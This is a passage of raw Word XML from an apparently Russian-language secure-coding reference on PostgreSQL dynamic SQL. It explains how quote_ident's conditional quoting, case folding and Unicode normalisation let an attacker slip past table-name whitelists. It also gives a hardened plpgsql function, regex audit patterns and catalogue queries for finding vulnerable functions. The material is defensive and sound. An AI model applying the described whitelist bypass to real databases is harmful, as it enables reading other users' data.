          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> перед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все требуют ручного аудита: ASCII-check присутствует?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Application-логи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relation "..." does not exist</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> от user-driven endpoint с case-mixed/Unicode именами.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`pg_class` audit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: existing таблицы с capital/Unicode именами в production-схеме — list для cross-check с whitelist каждой dynamic-SQL функции.</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Три независимых факта:</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`quote_ident` does conditional quoting</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Документация (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">System Information Functions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*"Returns the given string suitably quoted to be used as an identifier in an SQL statement string. Quotes are added only if necessary (i.e., if the string contains non-identifier characters or would be case-folded)."* Перевод: если входная строка </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">уже валидный non-quoted identifier</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (lowercase ASCII letters + digits + underscore),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возвращает её </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">без quotes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Это означает, что output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не unique для input — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">quote_ident('users') = 'users'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, но </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">quote_ident('Users') = '"Users"'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — разные SQL fragments из-за case-fold semantics.</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PostgreSQL case-folds unquoted identifiers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FROM Users</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> интерпретируется как </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT FROM users</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (lowercase). Но </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT FROM "Users"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — точное имя с capital U. Это означает, что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производит SQL-fragment, который указывает на </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">разные таблицы</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(если обе существуют).</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PostgreSQL accepts Unicode в identifier</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. При UTF-8 encoding, identifier может содержать любые letter-class Unicode chars.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не нормализует это.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Сочетание: whitelist через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unicode_normalize()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">может</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> скрыть существование таблиц с особенностью case/Unicode, и атакующий обходит whitelist payload-ом, который </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">bytes equal whitelist entry после normalize</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, но </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">identifier-equivalent другой таблице</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> в схеме.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Защита — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">ASCII-only check + точный whitelist без normalize</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app.read_table_safe(tbl_name text)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">RETURNS SETOF record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allowed text[] := ARRAY['public_users', 'public_articles', 'public_comments'];</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ASCII + lowercase + underscore-only check</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    IF tbl_name !~ '^[a-z_][a-z0-9_]*$'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'invalid identifier: %', tbl_name;</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 Точное сравнение (без lower / normalize)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    IF tbl_name &lt;&gt; ALL(allowed)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'table not in whitelist: %', tbl_name;</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RETURN QUERY EXECUTE format('SELECT * FROM %I', tbl_name);</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Regex </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">'^[a-z_][a-z0-9_]*$'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — POSIX char class, который </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">не включает</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Unicode letters (PostgreSQL regex с дефолтом не Unicode-class-aware, если не указано </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">[[:alpha:]]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">). Этот шаблон отклоняет любые non-ASCII, capital letters, dots, semicolons.</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с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(присутствует с очень ранних, ≥ 7.x).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EXECUTE на уязвимую функцию + наличие в схеме таблицы с case-mixed/Unicode именем (Variant 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whitelist через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normalize()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> ИЛИ whitelist отсутствует ИЛИ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используется для значений.</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корректный инструмент для всех cases, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">где user-input направляется как identifier</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Использовать </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">только</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> для identifier:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">-- Правильный pattern: identifier через quote_ident, value через USING</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">EXECUTE format('SELECT * FROM %I WHERE id = $1', tbl_name) USING row_id;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">-- ИЛИ:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">EXECUTE 'SELECT * FROM ' || quote_ident(tbl_name) || ' WHERE id = $1' USING row_id;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pP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для имени таблицы;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через USING — для значения </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">row_id</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canonical safe pattern</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, упомянутый в R18 источнике (xflr6 gist).</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на plpgsql-коде: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quote_ident\([^)]+\)\s*=</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=\s*quote_ident\(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слева/справа от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(попытка использовать для значения).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lower\([^)]+\)\s*&lt;?&gt;?\s*ALL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lower\(.*\)\s+IN\b</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — whitelist через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 требует ASCII-check рядом.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unicode_normalize</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> near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Unicode-normalize check, требует semantic audit.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prosrc LIKE '%quote_ident%lower(%'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — функции с lower-перед-quote_ident. Также </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">prosrc LIKE '%quote_ident%=%'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (broken value pattern).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`pg_class` cross-check</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: список всех tables (incl. quoted) vs whitelist каждой dynamic-SQL функции — manual audit.</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с очень ранних версий (≥ 7.x).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с 9.1. Никакие фиксы не закрывают этот класс — quote_ident behaviour (conditional quoting) — documented design.</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3.16.1 format %s vs %I</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функционально эквивалентен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но с case-quoting subtlety.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3.16.3 EXECUTE USING</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — правильный путь для значений (mis-use Variant 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3.16.4 || конкатенация</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — где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часто используется без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 SECURITY DEFINER + dynamic SQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — где case-bypass becomes critical (read чужих данных под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3.14.2 ORDER BY column_name</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — application-side analog: identical Unicode-homoglyph bypass class.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5.2 quote_ident, quote_literal, format('%I')</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — общая reference.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«System Information Functions»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https://www.postgresql.org/docs/current/functions-info.html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«Identifiers and Key Words» (case folding semantics) — https://www.postgresql.org/docs/current/sql-syntax-lexical.html#SQL-SYNTAX-IDENTIFIERS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«Pattern Matching» / POSIX regex character classes — https://www.postgresql.org/docs/current/functions-matching.html#POSIX-CHARACTER-CLASSES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Unicode TR #36 «Unicode Security Considerations» — https://www.unicode.org/reports/tr36/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depesz blog: «format vs quote_ident — when to use what» — https://www.depesz.com/2013/04/05/waiting-for-9-3-add-format-function-with-i-l-s-conversions/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xflr6 SQL injection safe pattern (R18 reference) — https://gist.github.com/xflr6/33db779acd7fe79faadeb0f28fc053bd</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">3.16.3 EXECUTE ... USING — безопасный bind для значений (не для identifier)</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 'SELECT ...' USING $1, $2, ...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — единственный способ в plpgsql безопасно подставить </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">значения</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> в dynamic SQL через bind-параметризацию. Работает так же, как application-side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-bind через Wire Protocol: значения сериализуются binary, не подвергаются SQL-парсингу, инъекция через quote-escape физически невозможна. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">НО</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USING $1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">не работает для identifier</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — если попытаться </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">EXECUTE 'SELECT * FROM $1' USING tbl_name</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
